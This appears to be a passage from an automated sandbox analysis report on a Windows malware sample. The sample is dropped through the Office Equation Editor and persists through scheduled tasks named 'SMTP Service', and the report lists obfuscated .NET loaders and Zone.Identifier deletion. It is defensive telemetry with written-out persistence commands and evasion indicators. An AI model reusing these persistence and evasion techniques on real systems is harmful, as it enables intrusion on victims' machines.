        Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5A32.tmp'
        Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {C7405FE6-0EEB-43B9-A9C9-0A01615FAA8D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe 0
        Source: unknownProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: unknownProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp'
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5A32.tmp'
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe 0
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess created: C:\Users\user\AppData\Roaming\JNM.exe C:\Users\user\AppData\Roaming\JNM.exe
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: C:\Users\user\AppData\Roaming\JNM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\AppData\Roaming\JNM.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: Pinaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: JNM.exe, 00000003.00000002.2356181917.00000000004D6000.00000004.00000020.sdmp
        Source: Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4JNM.PDB-F424491E3931}\Servererver32 source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
        Source: Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4JNM.PDB-F424491E3931}\Servererver32h source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
        Source: Binary string: MC:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbicddH?X source: JNM.exe, 00000003.00000002.2356207673.00000000004FA000.00000004.00000020.sdmp
        Source: Binary string: 8inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp
        Source: Binary string: >vbpC:\Users\user\AppData\Roaming\JNM.PDBBPJQ source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
        Source: Binary string: 8(P5jLC:\Windows\Microsoft.VisualBasic.pdb source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
        Source: Binary string: Qsers\user\AppData\Roaming\JNM.exeVisualBasic.pdb*n source: JNM.exe, 00000003.00000002.2356207673.00000000004FA000.00000004.00000020.sdmp
        Source: Binary string: 8C:\Users\user\AppData\Roaming\JNM.PDB source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\user\AppData\Roaming\JNM.exe77-1006j_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdb source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp, JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
        Source: Binary string: QC:\Users\user\AppData\Roaming\JNM.PDB source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
        Source: Binary string: M.PDBr source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp
        Source: Binary string: (P5jLC:\Windows\Microsoft.VisualBasic.pdb source: JNM.exe, 00000003.00000002.2356038607.00000000003E8000.00000004.00000001.sdmp
        Source: Binary string: ,:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmp
        Source: Binary string: )vbpC:\Users\user\AppData\Roaming\JNM.PDB.x source: JNM.exe, 0000000F.00000002.2355712720.0000000000298000.00000004.00000001.sdmp
        Source: Binary string: :\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: JNM.exe, 00000003.00000002.2366184294.0000000006EF0000.00000004.00000001.sdmp

        Data Obfuscation:

        barindex
        .NET source code contains potential unpackerShow sources
        Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 7_2_0044C3E8 push esp; iretd
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 7_2_006F234F push 00000000h; iretd
        Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\JNM.exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\JNM.exeFile created: C:\Program Files (x86)\SMTP Service\smtpsvc.exeJump to dropped file

        Boot Survival:

        barindex
        Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
        Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp6D54.tmp'

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
        Source: C:\Users\user\AppData\Roaming\JNM.exeFile opened: C:\Users\user\AppData\Roaming\JNM.exe:Zone.Identifier read attributes | delete
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\JNM.exeProcess information set: NOOPENFILEERRORBOX
